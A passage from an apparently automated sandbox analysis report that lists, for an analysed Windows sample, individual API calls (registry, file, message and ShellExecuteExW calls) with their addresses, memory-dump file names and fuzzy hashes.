                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                  • Instruction ID: 2036f094aef4cf8fcdd3ce51ebd23e93268b82f075a1b79732874c3119e34eec
                                                  • Opcode Fuzzy Hash: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                  • Instruction Fuzzy Hash: 30E086319001246ADB303AF15E8DEBF21586F44345B14093FFA12B62C2DAFC0C42467D
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 00406400
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                  • Instruction ID: a37d777e965e9699b0e23720f5de0982c89539c866ab1c77fb99c91eca42481e
                                                  • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                  • Instruction Fuzzy Hash: B2E0E672010109BFEF195F50ED0ADBB371DE704340F11452EFD07D4051E6B5A930A674
                                                  APIs
                                                  • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004101A0,0040CEF0,00403511,0040CEF0,004101A0,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
                                                  APIs
                                                  • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040241D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                                                  • Instruction ID: 84a3be15b77accaad8f92e5f77cb7225a0a8ac318d6267ea73d07213f2db240d
                                                  • Opcode Fuzzy Hash: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                                                  • Instruction Fuzzy Hash: D3E04F30800219AADB00AFA0CE09EAE3769BF00300F10093AF520BB0D1E7FC89409749
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406437,?,00000000,?,?,: Completed,?), ref: 004063CD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                  • Instruction ID: b93d09ea675ceb766083aeed6388771540e4ed4a45e177d9f546af7c41f1e6d1
                                                  • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                  • Instruction Fuzzy Hash: 2CD0123200020EBBDF115F91FD01FAB3B1DAB08710F014426FE06E4091D775D930A765
                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 1b895ffc69cdc6654b158d549c8f6e0cc4d2e654bd2dd499d8263cc4ca4a17a1
                                                  • Instruction ID: 319356c04533e9289a6ed1861cb0ef80ae0b3bb3c13a9342652098b8c4421f6d
                                                  • Opcode Fuzzy Hash: 1b895ffc69cdc6654b158d549c8f6e0cc4d2e654bd2dd499d8263cc4ca4a17a1
                                                  • Instruction Fuzzy Hash: 60D01772B042049BCB00DFA9AA48A9E73B0EF24328B308537D521F21D0D6B889519A2A
                                                  APIs
                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                  • Instruction ID: 113db2c9408c8cca4cfcb58c80206ddc2c6448e789c7211f53b93fac71a9565f
                                                  • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                  • Instruction Fuzzy Hash: 1FC04C71740601BADA208B509E45F0777546750740F158469B741A50E0CA74E411D62D
                                                  APIs
                                                  • ShellExecuteExW.SHELL32(?), ref: 00405B77
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID:
                                                  • API String ID: 587946157-0
                                                  • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                  • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                  • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                  • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                  • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                  • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                  • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,0040428B), ref: 004044BE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                  • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                  • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                  • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                  APIs
                                                    • Part of subcall function 004055A4: lstrlenW.KERNEL32(Crenature,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
